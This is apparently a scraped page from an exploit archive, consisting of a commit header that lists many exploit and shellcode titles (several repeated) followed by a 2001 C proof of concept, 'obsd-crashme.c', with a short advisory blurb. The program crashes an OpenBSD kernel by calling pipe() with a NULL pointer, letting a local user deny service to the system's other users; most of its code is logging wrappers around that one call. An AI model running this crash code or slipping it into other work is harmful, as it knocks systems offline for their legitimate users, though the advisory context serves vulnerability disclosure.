
14991 changes to exploits/shellcodes HTC Touch - vCard over IP Denial of Service TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities PeerBlock 1.1 - Blue Screen of Death WS10 Data Server - SCADA Overflow (PoC) Symantec Endpoint Protection 12.1.4013 - Service Disabling Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow man-db 2.4.1 - 'open_cat_stream()' Local uid=man CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation CDRecord's ReadCD - Local Privilege Escalation Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH) FreeBSD - Intel SYSRET Privilege Escalation (Metasploit) CCProxy 6.2 - 'ping' Remote Buffer Overflow Savant Web Server 3.1 - Remote Buffer Overflow (2) Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit) Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit) Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) TeamCity < 9.0.2 - Disabled Registration Bypass OpenSSH SCP Client - Write Arbitrary Files Kados R10 GreenBee - Multiple SQL Injection WordPress Core 5.0 - Remote Code Execution phpBB 3.2.3 - Remote Code Execution Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
129 lines
No EOL
3 KiB
C
129 lines
No EOL
3 KiB
C
// source: https://www.securityfocus.com/bid/3612/info
|
|
|
|
OpenBSD is a freely available implementation of the BSD Operating System. It is based on the NetBSD implementation.
|
|
|
|
Under some conditions, an application launched by a regular user on the system can cause a system crash. When an application on an OpenBSD system attempts to pipe a NULL value, a fault in the kernel causes the system to crash immediately.
|
|
|
|
This make it possible for a malicious local user to deny service to legitimate users of the system.
|
|
|
|
/* obsd-crashme.c - by Marco Peereboom <marcodsl@swbell.net> */
|
|
/* December 03, 2001 */
|
|
|
|
#include <stdlib.h>
|
|
#include <stdio.h>
|
|
#include <unistd.h>
|
|
#include <sys/wait.h>
|
|
#include <signal.h>
|
|
#include <stdarg.h>
|
|
#include <syslog.h>
|
|
|
|
/* globals */
|
|
int fd[8]; /* temp pipe file descriptors */
|
|
int fd_real[4]; /* real pipe's */
|
|
|
|
static int __DEBUG__ = 0;
|
|
static int __SYSLOG__ = 0;
|
|
|
|
void enable_debug(void)
|
|
{
|
|
__DEBUG__ = 1;
|
|
}
|
|
|
|
void disable_debug(void)
|
|
{
|
|
__DEBUG__ = 0;
|
|
}
|
|
|
|
void enable_syslog(void)
|
|
{
|
|
__SYSLOG__ = 1;
|
|
}
|
|
|
|
void disable_syslog(void)
|
|
{
|
|
__SYSLOG__ = 0;
|
|
}
|
|
|
|
void s_fprintf(FILE *file, const char *fmt, ...)
|
|
{
|
|
va_list ap;
|
|
|
|
if (__DEBUG__) {
|
|
fflush(file);
|
|
|
|
va_start(ap, fmt);
|
|
vfprintf(file, fmt, ap);
|
|
va_end(ap);
|
|
|
|
fflush(file);
|
|
}
|
|
|
|
if (__SYSLOG__) {
|
|
va_start(ap, fmt);
|
|
vsyslog(LOG_INFO, fmt, ap);
|
|
va_end(ap);
|
|
}
|
|
}
|
|
|
|
void *s_malloc(size_t size)
|
|
{
|
|
char serr[40]; /* can not allocate more mem so lets use this
|
|
ugly beast */
|
|
void *p;
|
|
|
|
if (__DEBUG__ || __SYSLOG__) {
|
|
s_fprintf(stderr, "PID=%-5i PPID=%-5i: malloc(%i)\n",
|
|
getpid(), getppid(), size);
|
|
}
|
|
|
|
if ((p = malloc(size)) == NULL ) {
|
|
sprintf(serr,"PID=%i, Could not allocate memory",
|
|
getpid());
|
|
perror(serr);
|
|
exit(6);
|
|
}
|
|
|
|
return p;
|
|
}
|
|
|
|
void s_perror(const char *str)
|
|
{
|
|
char *buf;
|
|
|
|
if (__DEBUG__ || __SYSLOG__) {
|
|
s_fprintf(stderr, "PID=%-5i PPID=%-5i: perror(%s)\n",
|
|
getpid(), getppid(), str);
|
|
}
|
|
|
|
buf = s_malloc(11 + strlen(str)); /* PID=%-5i = 11 chars */
|
|
sprintf(buf, "PID=%-5i %s", getpid(), str);
|
|
perror(buf);
|
|
|
|
free(buf);
|
|
}
|
|
|
|
void s_pipe(int *fd)
|
|
{
|
|
if (__DEBUG__ || __SYSLOG__) {
|
|
s_fprintf(stderr, "PID=%-5i PPID=%-5i: pipe(%x)\n",
|
|
getpid(), getppid(), (unsigned int)fd);
|
|
}
|
|
|
|
if (pipe(fd) == -1)
|
|
{
|
|
s_perror("Could not create pipe");
|
|
exit(3);
|
|
}
|
|
}
|
|
|
|
int main(int argc, char **argv)
|
|
{
|
|
enable_debug();
|
|
enable_syslog();
|
|
|
|
fprintf(stderr, "Before pipe\n");
|
|
s_pipe(NULL); /* test if s_pipe exits */
|
|
fprintf(stderr, "Will never reach this\n");
|
|
|
|
return 0;
|
|
} |